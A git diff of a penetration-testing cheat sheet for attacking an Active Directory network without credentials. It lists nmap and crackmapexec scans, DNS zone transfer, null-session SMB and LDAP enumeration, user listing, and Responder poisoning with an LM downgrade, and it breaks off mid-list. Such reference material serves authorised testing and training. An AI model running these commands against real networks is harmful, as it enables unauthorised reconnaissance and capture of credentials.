Update 01. No credentials.md

--- a/01. No credentials.md
+++ b/01. No credentials.md
@@ -1,5 +1,7 @@
 ### No credentials
-Scan network
+
+# Scan network
+
 cme smb <ip_range> # enumerate smb hosts
 nmap -sP -p <ip> # ping scan
 nmap -PN -sV --top-ports 50 --open <ip> # quick scan
@@ -8,31 +10,31 @@ nmap -PN -sC -sV -oA <output> <ip> # classic scan
 nmap -PN -sC -sV -p- -oA <output> <ip> # full scan
 nmap -sU -sC -sV -oA <output> <ip> # udp scan
 
-Find DC IP
+# Find DC IP
 nmcli dev show eth0 # show domain name & dns
 nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>
 
-Zone XFER
+# Zone XFER
 dig axfr <domain_name> @<name_server>
 
-List guest access SMB shares
+# List guest access SMB shares
 enum4linux -a -u "" -p "" <dc-ip> && enum4linux -a -u "guest" -p "" <dc-ip>
 smbmap -u "" -p "" -P 445 -H <dc-ip> && smbmap -u "guest" -p "" -P 445 -H <dc-ip>
 smbclient -U '%' -L //<dc-ip> && smbclient -U 'guest%' -L //<dc-ip>
 cme smb <ip> -u '' -p '' # enumerate null session
 cme smb <ip> -u 'a' -p '' # enumerate anonymous access
 
-Enumerate LDAP
+# Enumerate LDAP
 nmap -n -sV --script "ldap* and not brute" -p 389 <dc-ip>
 ldapsearch -x -h <ip> -s base  
 
-Find User List
+# Find User List
 enum4linux -U <dc-ip> | grep 'user:'
 cme smb <ip> --users 
 net rpc group members 'Domain Users' -W '<domain>' -I '<ip>' -U '%'
 nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='<domain>',userdb=<users_list_file>" <ip>  (OSINT/Internet)
 
-Poisoning
+# Poisoning
 responder -I eth0 (use --lm to force lm downgrade) # disable smb & http if relay
 Poisoning SMB ->
  HTTP ->
